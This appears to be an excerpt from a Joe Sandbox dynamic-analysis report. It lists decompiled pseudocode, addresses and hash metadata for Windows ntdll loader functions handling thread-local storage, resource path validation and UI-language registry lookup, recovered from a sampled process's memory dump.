                                                                                                                              0x1d7375ac
                                                                                                                              0x1d737652
                                                                                                                              0x1d7375b2
                                                                                                                              0x1d7375c2
                                                                                                                              0x1d7375c2
                                                                                                                              0x1d7375ca
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7375ca
                                                                                                                              0x1d737577
                                                                                                                              0x1d73757c
                                                                                                                              0x1d73757e
                                                                                                                              0x1d737583
                                                                                                                              0x1d737597
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d737597

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                              • API String ID: 0-1151232445
                                                                                                                              • Opcode ID: 8e4d043ddcc2ac4f55d5303eafa4855322e59e2b390ca47dca7d61352b7fa680
                                                                                                                              • Instruction ID: 8e9a3989b5c3d11dd2b6d949f8d13e9e811db26902b9b072b0b350363c9d3bfe
                                                                                                                              • Opcode Fuzzy Hash: 8e4d043ddcc2ac4f55d5303eafa4855322e59e2b390ca47dca7d61352b7fa680
                                                                                                                              • Instruction Fuzzy Hash: 03413935601280EFDF1DDE2CD0D47B6B7E0AF0123AF2484AAD48A8B65BC675D446CB23
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7715EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 88%
                                                                                                                              			E1D7715EF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t59;
				intOrPtr _t62;
				signed int _t83;
				intOrPtr _t87;
				intOrPtr _t95;
				intOrPtr* _t98;
				signed int _t99;
				intOrPtr _t102;
				void* _t104;
				void* _t106;

				_push(0x38);
				_push(0x1d81c6d0);
				E1D797BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t104 - 0x2c)) =  *[fs:0x18];
				 *((intOrPtr*)(_t104 - 0x24)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				 *((intOrPtr*)(_t104 - 0x1c)) = 0;
				L1D7453C0(0x1d836718);
				_t83 =  *0x1d835c90; // 0x11
				 *(_t104 - 0x48) = _t83;
				if(_t83 == 0) {
					_t102 =  *((intOrPtr*)(_t104 - 0x2c)) + 0x2c;
					L9:
					 *((intOrPtr*)( *((intOrPtr*)(_t104 - 0x2c)) + 0x2c)) = _t102;
					asm("lock inc dword [0x1d835c80]");
					E1D7452F0(_t83, 0x1d836718);
					_t59 = 0;
					L10:
					 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0x10));
					return _t59;
				}
				_t102 = E1D77174A(_t83);
				 *((intOrPtr*)(_t104 - 0x40)) = _t102;
				if(_t102 == 0) {
					E1D7452F0(_t83, 0x1d836718);
					_t59 = 0xc0000017;
					goto L10;
				}
				 *((intOrPtr*)(_t104 - 0x30)) = 0x1d8333a8;
				_t62 =  *0x1d8333a8; // 0x1ab2e60
				 *((intOrPtr*)(_t104 - 0x20)) = _t62;
				while(1) {
					_t98 =  *((intOrPtr*)(_t104 - 0x20));
					if(_t98 ==  *((intOrPtr*)(_t104 - 0x30))) {
						goto L9;
					}
					 *((intOrPtr*)(_t104 - 0x44)) = _t98;
					 *((intOrPtr*)(_t104 - 0x20)) =  *_t98;
					 *((intOrPtr*)(_t104 - 0x28)) = E1D771715(_t98, _t104 - 0x34);
					_t87 =  *0x1d835d78; // 0x0
					_t88 = _t87 + 0xc0000;
					 *(_t104 - 0x38) =  *(_t104 - 0x34);
					_t95 = E1D755D90(_t87 + 0xc0000,  *((intOrPtr*)(_t104 - 0x24)), _t87 + 0xc0000, _t65 +  *(_t104 - 0x34) + 1);
					if(_t95 == 0) {
						 *((intOrPtr*)(_t104 - 0x1c)) = 0xc0000017;
						L13:
						E1D7452F0(_t88, 0x1d836718);
						_t99 = 0;
						do {
							_t69 =  *((intOrPtr*)(_t102 + _t99 * 4));
							if( *((intOrPtr*)(_t102 + _t99 * 4)) != 0) {
								E1D753BC0( *((intOrPtr*)(_t104 - 0x24)), 0,  *((intOrPtr*)(_t69 - 4)));
							}
							_t99 = _t99 + 1;
						} while (_t99 <  *(_t104 - 0x48));
						_t42 = _t102 - 8; // -8
						E1D753BC0( *((intOrPtr*)(_t104 - 0x24)), 0, _t42);
						_t59 =  *((intOrPtr*)(_t104 - 0x1c));
						goto L10;
					}
					_t19 =  *(_t104 - 0x38) + 1; // 0x1
					_t88 = _t19 + _t95 &  !( *(_t104 - 0x38));
					 *((intOrPtr*)(_t88 - 4)) = _t95;
					_t21 = _t98 + 0x24; // 0x774b33c8
					 *(_t102 +  *_t21 * 4) = _t88;
					 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
					_t27 = _t98 + 8; // 0x18
					E1D7888C0(_t88,  *_t27,  *((intOrPtr*)(_t104 - 0x28)));
					_t106 = _t106 + 0xc;
					 *(_t104 - 4) = 0xfffffffe;
					if( *((intOrPtr*)(_t104 - 0x1c)) < 0) {
						goto L13;
					}
					if(( *0x1d8337c0 & 0x00000005) != 0) {
						_t45 = _t98 + 0x24; // 0x774b33c8
						_t83 =  *_t45;
						_push( *((intOrPtr*)(_t102 + _t83 * 4)));
						_t48 = _t98 + 8; // 0x18
						_push( *_t48);
						_t49 = _t98 + 0xc; // 0x0
						_t50 = _t98 + 8; // 0x18
						_push( *_t49 -  *_t50);
						_push(_t83);
						E1D7BE692("minkernel\\ntdll\\ldrtls.c", 0x369, "LdrpAllocateTls", 2, "TlsVector %p Index %d : %d bytes copied from %p to %p\n", _t102);
						_t106 = _t106 + 0x28;
					}
				}
				goto L9;
			}













                                                                                                                              0x1d7715ef
                                                                                                                              0x1d7715f1
                                                                                                                              0x1d7715f6
                                                                                                                              0x1d771601
                                                                                                                              0x1d77160d
                                                                                                                              0x1d771612
                                                                                                                              0x1d77161b
                                                                                                                              0x1d771620
                                                                                                                              0x1d771626
                                                                                                                              0x1d77162b
                                                                                                                              0x1d7716ed
                                                                                                                              0x1d7716f0
                                                                                                                              0x1d7716f3
                                                                                                                              0x1d7716f6
                                                                                                                              0x1d7716fe
                                                                                                                              0x1d771703
                                                                                                                              0x1d771705
                                                                                                                              0x1d771708
                                                                                                                              0x1d771714
                                                                                                                              0x1d771714
                                                                                                                              0x1d771636
                                                                                                                              0x1d771638
                                                                                                                              0x1d77163d
                                                                                                                              0x1d7b18ae
                                                                                                                              0x1d7b18b3
                                                                                                                              0x00000000
                                                                                                                              0x1d7b18b3
                                                                                                                              0x1d771643
                                                                                                                              0x1d77164a
                                                                                                                              0x1d77164f
                                                                                                                              0x1d771652
                                                                                                                              0x1d771652
                                                                                                                              0x1d771658
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d77165e
                                                                                                                              0x1d771665
                                                                                                                              0x1d771672
                                                                                                                              0x1d771675
                                                                                                                              0x1d77167b
                                                                                                                              0x1d771684
                                                                                                                              0x1d771694
                                                                                                                              0x1d771698
                                                                                                                              0x1d7b18bd
                                                                                                                              0x1d7b18c4
                                                                                                                              0x1d7b18c5
                                                                                                                              0x1d7b18ca
                                                                                                                              0x1d7b18cc
                                                                                                                              0x1d7b18cc
                                                                                                                              0x1d7b18d1
                                                                                                                              0x1d7b18db
                                                                                                                              0x1d7b18db
                                                                                                                              0x1d7b18e0
                                                                                                                              0x1d7b18e1
                                                                                                                              0x1d7b18e6
                                                                                                                              0x1d7b18ef
                                                                                                                              0x1d7b18f4
                                                                                                                              0x00000000
                                                                                                                              0x1d7b18f4
                                                                                                                              0x1d7716a1
                                                                                                                              0x1d7716a8
                                                                                                                              0x1d7716aa
                                                                                                                              0x1d7716ad
                                                                                                                              0x1d7716b0
                                                                                                                              0x1d7716b3
                                                                                                                              0x1d7716ba
                                                                                                                              0x1d7716be
                                                                                                                              0x1d7716c3
                                                                                                                              0x1d7716c6
                                                                                                                              0x1d7716d2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7716df
                                                                                                                              0x1d7b1931
                                                                                                                              0x1d7b1931
                                                                                                                              0x1d7b1934
                                                                                                                              0x1d7b1937
                                                                                                                              0x1d7b1937
                                                                                                                              0x1d7b193a
                                                                                                                              0x1d7b193d
                                                                                                                              0x1d7b1940
                                                                                                                              0x1d7b1941
                                                                                                                              0x1d7b1959
                                                                                                                              0x1d7b195e
                                                                                                                              0x1d7b195e
                                                                                                                              0x1d7716df
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              • LdrpAllocateTls, xrefs: 1D7B194A
                                                                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 1D7B1943
                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 1D7B1954
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                              • API String ID: 0-4274184382
                                                                                                                              • Opcode ID: 7977b197b5508f8847d00126acafd823d00eef0ce5ad810b66d2a15c212525a1
                                                                                                                              • Instruction ID: 7ce939dcee7462ba51b731c5b021330d2f00bfbac60b4046cb9b357ffddbd0ac
                                                                                                                              • Opcode Fuzzy Hash: 7977b197b5508f8847d00126acafd823d00eef0ce5ad810b66d2a15c212525a1
                                                                                                                              • Instruction Fuzzy Hash: 8B419079A00615EFCB05CFA8EC44BADBBB2FF48320F118619E905A7351D735B800CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7FBD08 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 85%
                                                                                                                              			E1D7FBD08(intOrPtr __ecx, void* __edx, char* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _t64;
				void* _t68;
				char* _t75;

				_v8 = _v8 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_t64 = 0;
				_v20 = __ecx;
				_v12 = 7;
				if(__ecx == 0) {
					L14:
					_t76 = 0xc000000d;
				} else {
					_t75 = _a4;
					if(_t75 == 0 || _a8 == 0) {
						goto L14;
					} else {
						E1D785050(__ecx,  &_v28, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
						_v52 = 0x18;
						_v44 =  &_v28;
						_v48 = 0;
						_push( &_v52);
						_push(0x20019);
						_v40 = 0x40;
						_push( &_v8);
						_v36 = 0;
						_v32 = 0;
						if(E1D782AB0() >= 0) {
							E1D785050(0,  &_v28, L"PreferredUILanguages");
							_push(0);
							_t68 = E1D73D64A(_v8,  &_v28,  &_v12, 0,  &_v16);
							_t76 = 0xc0000034;
							if(_t68 == 0xc0000034) {
								goto L4;
							} else {
								_t54 = _v16;
								if(_v16 == 0) {
									goto L4;
								} else {
									if(_t68 == 0x80000005) {
										_t64 = E1D755D90(_t68,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t54 + 2);
										if(_t64 != 0) {
											_push(_t68);
											_t76 = E1D73D64A(_v8,  &_v28,  &_v12, _t64,  &_v16);
											if(_t76 >= 0) {
												if(_v12 == 7 || _v12 == 1) {
													 *_t75 = 0;
													_t76 = L1D764CA6(_v20, _t64, _v16 >> 1, 8, 3, 1, _a8);
												} else {
													goto L4;
												}
											}
										} else {
											_t76 = 0xffffffffc0000017;
										}
									}
								}
							}
						} else {
							L4:
							_t76 = 0;
							 *_t75 = 1;
						}
					}
				}
				if(_v8 != 0) {
					_push(_v8);
					E1D782A80();
				}
				if(_t64 != 0) {
					E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t64);
				}
				return _t76;
			}

















                                                                                                                              0x1d7fbd10
                                                                                                                              0x1d7fbd16
                                                                                                                              0x1d7fbd1c
                                                                                                                              0x1d7fbd1e
                                                                                                                              0x1d7fbd21
                                                                                                                              0x1d7fbd2b
                                                                                                                              0x1d7fbe3a
                                                                                                                              0x1d7fbe3a
                                                                                                                              0x1d7fbd31
                                                                                                                              0x1d7fbd31
                                                                                                                              0x1d7fbd36
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbd45
                                                                                                                              0x1d7fbd4e
                                                                                                                              0x1d7fbd56
                                                                                                                              0x1d7fbd5d
                                                                                                                              0x1d7fbd65
                                                                                                                              0x1d7fbd68
                                                                                                                              0x1d7fbd69
                                                                                                                              0x1d7fbd71
                                                                                                                              0x1d7fbd78
                                                                                                                              0x1d7fbd79
                                                                                                                              0x1d7fbd7c
                                                                                                                              0x1d7fbd86
                                                                                                                              0x1d7fbd9b
                                                                                                                              0x1d7fbda0
                                                                                                                              0x1d7fbdb6
                                                                                                                              0x1d7fbdb8
                                                                                                                              0x1d7fbdbf
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbdc1
                                                                                                                              0x1d7fbdc1
                                                                                                                              0x1d7fbdc6
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbdc8
                                                                                                                              0x1d7fbdce
                                                                                                                              0x1d7fbde4
                                                                                                                              0x1d7fbde8
                                                                                                                              0x1d7fbdef
                                                                                                                              0x1d7fbe04
                                                                                                                              0x1d7fbe08
                                                                                                                              0x1d7fbe0e
                                                                                                                              0x1d7fbe2e
                                                                                                                              0x1d7fbe36
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbe0e
                                                                                                                              0x1d7fbdea
                                                                                                                              0x1d7fbdea
                                                                                                                              0x1d7fbdea
                                                                                                                              0x1d7fbde8
                                                                                                                              0x1d7fbdce
                                                                                                                              0x1d7fbdc6
                                                                                                                              0x1d7fbd88
                                                                                                                              0x1d7fbd88
                                                                                                                              0x1d7fbd88
                                                                                                                              0x1d7fbd8a
                                                                                                                              0x1d7fbd8a
                                                                                                                              0x1d7fbd86
                                                                                                                              0x1d7fbd36
                                                                                                                              0x1d7fbe43
                                                                                                                              0x1d7fbe45
                                                                                                                              0x1d7fbe48
                                                                                                                              0x1d7fbe48
                                                                                                                              0x1d7fbe4f
                                                                                                                              0x1d7fbe5d
                                                                                                                              0x1d7fbe5d
                                                                                                                              0x1d7fbe68

                                                                                                                              Strings
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1D7FBD45
                                                                                                                              • @, xrefs: 1D7FBD71
                                                                                                                              • PreferredUILanguages, xrefs: 1D7FBD92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              • Opcode ID: 8983b2ce6d897a736fa7795c48b76a5255809993772c8de6b8bf8af2a83510d1
                                                                                                                              • Instruction ID: cb5f7d2470d2ddf66ecf826d99b83d12f9b29f99f6a638ab32ffcbdd2579eacf
                                                                                                                              • Opcode Fuzzy Hash: 8983b2ce6d897a736fa7795c48b76a5255809993772c8de6b8bf8af2a83510d1
                                                                                                                              • Instruction Fuzzy Hash: 14415072E00249EBDB21CF94C895BFEB7B8AF04724F15406AE615B7250D774AE448B93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7D3CD4 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 89%
                                                                                                                              			E1D7D3CD4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				short _t35;
				short _t36;
				intOrPtr _t38;
				void* _t54;
				signed char* _t55;
				signed char* _t61;
				signed char _t65;
				signed int _t76;
				void* _t81;
				signed char* _t83;
				void* _t86;

				_push(0x6c);
				_push(0x1d81cf60);
				E1D797C40(__ebx, __edi, __esi);
				_t81 = __ecx;
				_t65 = 0x3a;
				 *(_t86 - 0x50) = _t65;
				_t35 = 0x3c;
				 *((short*)(_t86 - 0x4e)) = _t35;
				 *(_t86 - 0x4c) = L"LdrpResValidateFilePath Enter";
				_t36 = 0x38;
				 *((short*)(_t86 - 0x58)) = _t36;
				 *(_t86 - 0x56) = _t65;
				 *(_t86 - 0x54) = L"LdrpResValidateFilePath Exit";
				if(E1D753C40() == 0) {
					_t66 = 0x7ffe0385;
				} else {
					_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				if(( *_t66 & 0x00000001) == 0) {
					_t61 = 0x7ffe0384;
				} else {
					_t54 = E1D753C40();
					_t61 = 0x7ffe0384;
					if(_t54 == 0) {
						_t55 = 0x7ffe0384;
					} else {
						_t55 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t66 = _t86 - 0x50;
					E1D7CFC01(_t86 - 0x50,  *_t55 & 0x000000ff);
				}
				if(_t81 != 0) {
					 *((intOrPtr*)(_t86 - 4)) = 0;
					_t38 = E1D7434C0(_t81);
					 *((intOrPtr*)(_t86 - 0x7c)) = _t38;
					 *((intOrPtr*)(_t86 - 4)) = 0xfffffffe;
					if(_t38 == 1 || _t38 == 2 || _t38 == 6) {
						if(E1D761BA0(_t66, _t81, _t86 - 0x60, 0, 0) != 0) {
							 *((intOrPtr*)(_t86 - 0x78)) = 0x18;
							 *((intOrPtr*)(_t86 - 0x74)) = 0;
							 *((intOrPtr*)(_t86 - 0x6c)) = 0x40;
							 *((intOrPtr*)(_t86 - 0x70)) = _t86 - 0x60;
							 *((intOrPtr*)(_t86 - 0x68)) = 0;
							 *((intOrPtr*)(_t86 - 0x64)) = 0;
							_push(_t86 - 0x44);
							_push(_t86 - 0x78);
							_t76 = E1D782D80();
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t86 - 0x5c)));
							if(_t76 >= 0) {
								asm("sbb edi, edi");
								_t76 =  ~( *(_t86 - 0x24) & 0x10) & 0xc000000d;
							}
						} else {
							_t76 = 0xc000003a;
						}
						goto L18;
					} else {
						goto L10;
					}
				} else {
					L10:
					_t76 = 0xc000000d;
					L18:
					_t83 = 0x7ffe0385;
					if(E1D753C40() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t83 & 0x00000001) != 0) {
						if(E1D753C40() != 0) {
							_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						E1D7CFC01(_t86 - 0x58,  *_t61 & 0x000000ff);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0x10));
					return _t76;
				}
			}














                                                                                                                              0x1d7d3cd4
                                                                                                                              0x1d7d3cd6
                                                                                                                              0x1d7d3cdb
                                                                                                                              0x1d7d3ce0
                                                                                                                              0x1d7d3ce4
                                                                                                                              0x1d7d3ce5
                                                                                                                              0x1d7d3ceb
                                                                                                                              0x1d7d3cec
                                                                                                                              0x1d7d3cf0
                                                                                                                              0x1d7d3cf9
                                                                                                                              0x1d7d3cfa
                                                                                                                              0x1d7d3cfe
                                                                                                                              0x1d7d3d02
                                                                                                                              0x1d7d3d10
                                                                                                                              0x1d7d3d23
                                                                                                                              0x1d7d3d12
                                                                                                                              0x1d7d3d1b
                                                                                                                              0x1d7d3d1b
                                                                                                                              0x1d7d3d2b
                                                                                                                              0x1d7d3d5a
                                                                                                                              0x1d7d3d2d
                                                                                                                              0x1d7d3d2d
                                                                                                                              0x1d7d3d32
                                                                                                                              0x1d7d3d39
                                                                                                                              0x1d7d3d4b
                                                                                                                              0x1d7d3d3b
                                                                                                                              0x1d7d3d44
                                                                                                                              0x1d7d3d44
                                                                                                                              0x1d7d3d50
                                                                                                                              0x1d7d3d53
                                                                                                                              0x1d7d3d53
                                                                                                                              0x1d7d3d61
                                                                                                                              0x1d7d3d6f
                                                                                                                              0x1d7d3d73
                                                                                                                              0x1d7d3d78
                                                                                                                              0x1d7d3d7b
                                                                                                                              0x1d7d3d85
                                                                                                                              0x1d7d3d9f
                                                                                                                              0x1d7d3dab
                                                                                                                              0x1d7d3db2
                                                                                                                              0x1d7d3db5
                                                                                                                              0x1d7d3dbf
                                                                                                                              0x1d7d3dc2
                                                                                                                              0x1d7d3dc5
                                                                                                                              0x1d7d3dcb
                                                                                                                              0x1d7d3dcf
                                                                                                                              0x1d7d3dd5
                                                                                                                              0x1d7d3de4
                                                                                                                              0x1d7d3deb
                                                                                                                              0x1d7d3df7
                                                                                                                              0x1d7d3df9
                                                                                                                              0x1d7d3df9
                                                                                                                              0x1d7d3da1
                                                                                                                              0x1d7d3da1
                                                                                                                              0x1d7d3da1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d3d63
                                                                                                                              0x1d7d3d63
                                                                                                                              0x1d7d3d63
                                                                                                                              0x1d7d3e21
                                                                                                                              0x1d7d3e21
                                                                                                                              0x1d7d3e2d
                                                                                                                              0x1d7d3e38
                                                                                                                              0x1d7d3e38
                                                                                                                              0x1d7d3e41
                                                                                                                              0x1d7d3e4a
                                                                                                                              0x1d7d3e55
                                                                                                                              0x1d7d3e55
                                                                                                                              0x1d7d3e61
                                                                                                                              0x1d7d3e61
                                                                                                                              0x1d7d3e6b
                                                                                                                              0x1d7d3e77
                                                                                                                              0x1d7d3e77

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              • Opcode ID: 29df9f2960d5d1f3edd2143a35b75323f2af6b39b7db0b7e30df0f7042772279
                                                                                                                              • Instruction ID: d389a3f7813f7b56a22d9b2489165c6e0a79ce9e4a9def83463467a48b44706f
                                                                                                                              • Opcode Fuzzy Hash: 29df9f2960d5d1f3edd2143a35b75323f2af6b39b7db0b7e30df0f7042772279
                                                                                                                              • Instruction Fuzzy Hash: 1341E136905B988FDB228BA4D844BACB7B8EF45720F21005BD905EF3A1D7759900CB13
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D771527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 73%
                                                                                                                              			E1D771527(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				intOrPtr _t19;
				signed int _t25;
				signed int _t28;
				intOrPtr _t35;
				signed int _t39;
				signed int _t41;
				signed int _t43;
				void* _t45;
				signed int _t51;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(_t28);
				_t43 =  *0x1d835d8c; // 0x1ab2b50
				_push(_t39);
				if(_t43 == 0x1d835d8c) {
					L5:
					 *0x1d835c90 =  *0x1d835c90 & 0x00000000;
					 *0x1d835c94 =  *0x1d835c94 & 0x00000000;
					_t51 =  *0x1d835c94;
					L6:
					_t17 = E1D7715EF(_t28, _t39, _t43, _t51);
					L7:
					return _t17;
				}
				_t28 = 1;
				do {
					_t39 = _t43;
					_t43 =  *_t43;
					_t4 = _t39 + 0x18; // 0x400000
					_t19 = E1D74DE20(_t32, 1,  *_t4, _t28, 9,  &_v12);
					_v12 = _t19;
					if(_t19 != 0) {
						__eflags =  *0x1d8337c0 & 0x00000005;
						if(__eflags != 0) {
							_push(_t19);
							_t12 = _t39 + 0x24; // 0x1ab2b74
							E1D7BE692("minkernel\\ntdll\\ldrtls.c", 0x241, "LdrpInitializeTls", 2, "DLL \"%wZ\" has TLS information at %p\n", _t12);
							_t19 = _v12;
							_t45 = _t45 + 0x1c;
						}
						_push(0);
						_push(0);
						_push( &_v8);
						_t32 = _t19;
						_t17 = E1D771796(_t28, _t19, _t39, _t39, _t43, __eflags);
						__eflags = _t17;
						if(__eflags < 0) {
							goto L7;
						}
						 *((short*)(_t39 + 0x3a)) = 0xffff;
					}
				} while (_t43 != 0x1d835d8c);
				_t43 = _v8;
				if(_t43 != 0) {
					_t11 = _t43 + 8; // 0x8
					_t41 = _t11;
					__eflags = _t41 - 0x20;
					if(_t41 > 0x20) {
						_t35 =  *0x1d835d78; // 0x0
						_t14 = _t43 + 0x27; // 0x27
						_t28 = _t14 >> 5;
						_t25 = E1D755D90(_t35 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, _t28 << 2);
						__eflags = _t25;
						if(_t25 != 0) {
							_t43 = _v8;
							L13:
							 *0x1d835c90 = _t41;
							_t39 = 0x1d835c90;
							 *0x1d835c98 = _t28;
							 *0x1d835c94 = _t25;
							E1D771AD0(0x1d835c90, 0, _t43);
							E1D771B10(0x1d835c90, _t43, 8);
							goto L6;
						}
						_t17 = 0xc0000017;
						goto L7;
					}
					_t25 = 0x1d835c88;
					goto L13;
				}
				goto L5;
			}



















                                                                                                                              0x1d771527
                                                                                                                              0x1d77152c
                                                                                                                              0x1d77152d
                                                                                                                              0x1d77152e
                                                                                                                              0x1d771532
                                                                                                                              0x1d771534
                                                                                                                              0x1d77153a
                                                                                                                              0x1d771541
                                                                                                                              0x1d77156f
                                                                                                                              0x1d77156f
                                                                                                                              0x1d771576
                                                                                                                              0x1d771576
                                                                                                                              0x1d77157d
                                                                                                                              0x1d77157d
                                                                                                                              0x1d771582
                                                                                                                              0x1d771586
                                                                                                                              0x1d771586
                                                                                                                              0x1d771545
                                                                                                                              0x1d771546
                                                                                                                              0x1d771549
                                                                                                                              0x1d77154b
                                                                                                                              0x1d771551
                                                                                                                              0x1d771554
                                                                                                                              0x1d771559
                                                                                                                              0x1d77155e
                                                                                                                              0x1d771587
                                                                                                                              0x1d77158e
                                                                                                                              0x1d7b1845
                                                                                                                              0x1d7b1846
                                                                                                                              0x1d7b1860
                                                                                                                              0x1d7b1865
                                                                                                                              0x1d7b1868
                                                                                                                              0x1d7b1868
                                                                                                                              0x1d771594
                                                                                                                              0x1d771596
                                                                                                                              0x1d77159d
                                                                                                                              0x1d77159e
                                                                                                                              0x1d7715a0
                                                                                                                              0x1d7715a5
                                                                                                                              0x1d7715a7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7715ae
                                                                                                                              0x1d7715ae
                                                                                                                              0x1d771560
                                                                                                                              0x1d771568
                                                                                                                              0x1d77156d
                                                                                                                              0x1d7715b4
                                                                                                                              0x1d7715b4
                                                                                                                              0x1d7715b7
                                                                                                                              0x1d7715ba
                                                                                                                              0x1d7b1870
                                                                                                                              0x1d7b1876
                                                                                                                              0x1d7b1879
                                                                                                                              0x1d7b1892
                                                                                                                              0x1d7b1897
                                                                                                                              0x1d7b1899
                                                                                                                              0x1d7b18a5
                                                                                                                              0x1d7715c5
                                                                                                                              0x1d7715c6
                                                                                                                              0x1d7715cc
                                                                                                                              0x1d7715d4
                                                                                                                              0x1d7715da
                                                                                                                              0x1d7715df
                                                                                                                              0x1d7715e8
                                                                                                                              0x00000000
                                                                                                                              0x1d7715e8
                                                                                                                              0x1d7b189b
                                                                                                                              0x00000000
                                                                                                                              0x1d7b189b
                                                                                                                              0x1d7715c0
                                                                                                                              0x00000000
